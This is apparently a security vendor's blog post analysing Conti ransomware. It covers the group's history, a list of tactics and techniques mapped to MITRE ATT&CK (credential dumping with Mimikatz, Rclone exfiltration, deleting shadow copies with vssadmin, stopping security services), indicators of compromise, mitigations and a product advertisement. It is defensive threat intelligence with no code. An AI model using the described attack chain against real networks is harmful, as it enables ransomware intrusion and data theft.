In this article, we will discuss Conti Ransomware in detail. We’ll present our analysis results and the tactics, techniques, and procedures (TTP). Let’s look at some interesting facts about vulnerabilities explored in the Conti Ransomware attack.
The Conti is a ransomware-as-a-service (RaaS) operation believed to be controlled by a cybercrime group in Russia called WizardSpider. The ransomware shares some code with the infamous Ryuk Ransomware, which was last reported in July 2020. The Conti ransomware gains initial access to the network through malicious attachments and links, encrypts data, and spreads to other systems exceptionally quickly, which makes it a very dangerous malicious actor. Cybercriminals typically launch Conti ransomware attacks by stealing files, encrypting servers and workstations, and demanding a ransom payment. Conti was considered one of the most successful ransomware gangs of 2021 and continues to be one of the most prolific ransomware gangs today, especially since REvil members were arrested at the beginning of 2022. According to the Ransomware project, Conti is a highly prolific threat actor managing to obtain more than $50 Million.
Since 2020, Conti has been making headlines consistently. A joint advisory was issued by the Cybersecurity Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) to the organizations about the malicious threat posed by the ransomware group and the vulnerabilities it exploits. According to the advisory FBI Flash: Conti Ransomware Attacks Impact Healthcare and First Responder Networks, Conti ransomware has been used in more than 400 attacks against U.S. and international organizations. A typical Conti ransomware attack involves malicious cyber actors stealing files, encrypting servers and workstations, and demanding ransom payments to access those files.
According to the advisory, CISA, FBI, and the National Security Agency (NSA) recommend implementing mitigation measures such as multifactor authentication (MFA), network segmentation, and updating operating systems & software to mitigate the Conti ransomware.
Conti continues his prolific track record in 2022, with four attacks reported within the first two months of the New Year. The following are a few recent incidents involving the Conti group.
Recently Conti pledged loyalty to the government of Russia
During the Russia – Ukraine War in 2022, the Conti ransomware gang pledged its allegiance to the Russian government. It warned of performing retaliatory attacks on the critical infrastructure of any nation that opposed the war-planned cyberattacks against Russia.
Tactics, Techniques, and Procedures
The group is using phishing attacks within the organization to install the TrickBot, IcedID, Cobalt Strike, and BazarLoader trojans to gain remote access to the compromised machines. Conti actors exploit legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks. According to our analysis of multiple malicious attacks involving the Conti ransomware, we believe the following attack vector is their overall strategy:
- Phishing and Spear-Phishing Campaigns
- Exploit Vulnerable External Assets like Firewalls
- Internet-facing RDP (Remote Desktop Protocol) Servers
- Scan the internal Servers, endpoints, backups, sensitive data
- Gather Live IP addresses and Ports by using popular port scanners like ‘Angry IP Scanner,’ ‘Advanced Port Scanner,’ or RouterScan to compile a list of IP addresses.
- Used RDP and remote monitoring software to maintain persistence.
- Install Backdoors like BazarLoader and create processes and registry entries to maintain persistence.
- Use tools like Mimikatz to escalate the privileges and gain Domain administrator privileges or equivalent
- Disable security measures so that they may move laterally around the network without being noticed
- Dump Credentials using popular post-exploitation tools like Mimikatz, Windows SysInternals, etc.
- Use RCE (remote code execution) vulnerability to distribute to all servers identified.
- Inject in Logon scripts and Batch scripts to loop over the list of IP addresses to deploy the code to as many servers as possible in GPO for whenever the computer starts up and joins the domain
Command and Control
- Used four Cobalt Strike server Internet Protocol (IP) addresses used by Conti for communication with their C2 server
- Exfiltrate as much data as possible in a variety of methods. The files can be saved on their server, transmitted through email, or uploaded to one or more anonymous cloud storage containers.
- Used the Rclone tool for data exfiltration
CONTI TTP – MITRE ATT&CK Mapping
According to CISA, the following is the mapping of Conti TTP with Mitre Att&ck Matrix.
CONTI TTP – MITRE ATT&CK MAPPING
According to CISA, the following is the mapping of Conti TTP with Mitre Att&ck Matrix:
||Conti actors have been observed gaining unauthorized access to victim networks through stolen Remote Desktop Protocol (RDP) credentials.
|Phishing: Spearphishing Attachment
||Conti ransomware can be delivered using TrickBot malware, which is known to use an email with an Excel sheet containing a malicious macro to deploy the malware.
|Phishing: Spearphishing Link
||Conti ransomware can be delivered using TrickBot, which has been delivered via malicious links in phishing emails.
|Command and Scripting Interpreter: Windows Command Shell
||Conti ransomware can utilize command line options to allow an attacker control over how it scans and encrypts files.
|Native Application Programming Interface (API)
||Conti ransomware has used API calls during execution.
||Conti actors have been observed gaining unauthorized access to victim networks through stolen RDP credentials.
|External Remote Services
||Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as virtual private networks (VPNs), Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.
|Process Injection: Dynamic-link Library Injection
||Conti ransomware has loaded an encrypted dynamic-link library (DLL) into memory and then executes it.
|Obfuscated Files or Information
||Conti ransomware has encrypted DLLs and used obfuscation to hide Windows API calls.
|Process Injection: Dynamic-link Library Injection
||Conti ransomware has loaded an encrypted DLL into memory and then executes it.
|Deobfuscate/Decode Files or Information
||Conti ransomware has decrypted its payload using a hardcoded AES-256 key.
||Conti actors use legitimate tools to maliciously scan for and brute force routers, cameras, and network-attached storage devices with web interfaces.
|Steal or Forge Kerberos Tickets: Kerberoasting
||Conti actors use Kerberos attacks to attempt to get the Admin hash.
|System Network Configuration Discovery
||Conti ransomware can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and checking to ensure the IP addresses it connects to are for local, non-internet systems.
|System Network Connections Discovery
||Conti ransomware can enumerate routine network connections from a compromised host.
||Conti ransomware can enumerate through all open processes to search for any that have the string SQL in their process name.
|File and Directory Discovery
||Conti ransomware can discover files on a local system.
|Network Share Discovery
||Conti ransomware can enumerate remote open server message block (SMB) network shares using NetShareEnum().
|Remote Services: SMB/Windows Admin Shares
||Conti ransomware can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.
|Taint Shared Content
||Conti ransomware can spread itself by infecting other remote machines via network shared drives.
|Data Encrypted for Impact
||Conti ransomware can use CreateIoCompletionPort(), PostQueuedCompletionStatus(), and GetQueuedCompletionPort() to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti ransomware can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.
||Conti ransomware can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop.
|Inhibit System Recovery
||Conti ransomware can delete Windows Volume Shadow Copies using vssadmin.
Table 2: Conti ATT&CK techniques for enterprise
How does Conti Work?
When executed, it will encrypt files and change their file extension [.]ODMUA. It will leave a ransom note in the form of a text file named “readme.txt.”
Indicators of Compromise
Encrypted Files Extension
Ransom Demand Message
Cyber Criminal Contact
- C:\documents and settings\conti_readme[.]txt
How to Safeguard Against CONTI?
Staying safe from data breaches is possible with the proper knowledge, practices, and reliable solutions. Prevent initial access at any costs. Following are basic mitigations:
- An efficient and effective Threat Intelligence pipeline to stay updated about adversarial TTP
- They are patching your OS (Operating System), software, and firmware as soon as manufacturers make essential updates.
- Proper segregation and isolation of internal networks.
- To network systems and accounts, be sure to update passwords regularly. An effective password policy that addresses password complexity and password rotation are vital.
- Deploy properly configured NGFW/IDPS/XDR/EDR systems to monitor and thwart malicious activities.
- Deactivate any ports that aren’t used for remote access/Remote Desktop Protocol (RDP).
- Proper system monitoring pipeline for better logging capability, including Powershell, Jscript, etc.
- Employee education is equally important: avoid using the same password for multiple accounts and multiple-factor authentication.
- Cybersecurity education is vital. The best means of preventing such incidents is through cybersecurity education.
- Suspicious emails should be avoided.
- Please do not open attachments or click on links if you receive such an email.
- Double-check that an email is legitimate, especially if it urges you to make a financial transaction.
- Effective and redundant fail-proof backup plans.
- Use multi-factor authentication whenever possible.
How To Detect Ongoing Ransomware Attacks?
Cyber security threats and ransomware attacks are increasing at a tremendous pace. It is extremely difficult for cyber security analysts and incident responders to investigate and detect cyber security threats using conventional tools and techniques. NetSecurity’s ThreatResponder, with its diverse capabilities, can help your team detect the most advanced cyber threats, including APTs, zero-day attacks, and ransomware attacks. It can also help automate incident response actions across millions of endpoints, making it easy, fast, and hassle-free.
Want to try our ThreatResponder, cutting-edge Endpoint Detection & Response (EDR) security solution in action? Click on the below button to request a free demo of our NetSecurity’s ThreatResponder platform.
The page’s content shall be deemed proprietary and privileged information of NETSECURITY CORPORATION. It shall be noted that NETSECURITY CORPORATION copyrights the contents of this page. Any violation/misuse/unauthorized use of this content “as is” or “modified” shall be considered illegal and subjected to articles and provisions that have been stipulated in the General Data Protection Regulation (GDPR) and Personal Data Protection Law (PDPL).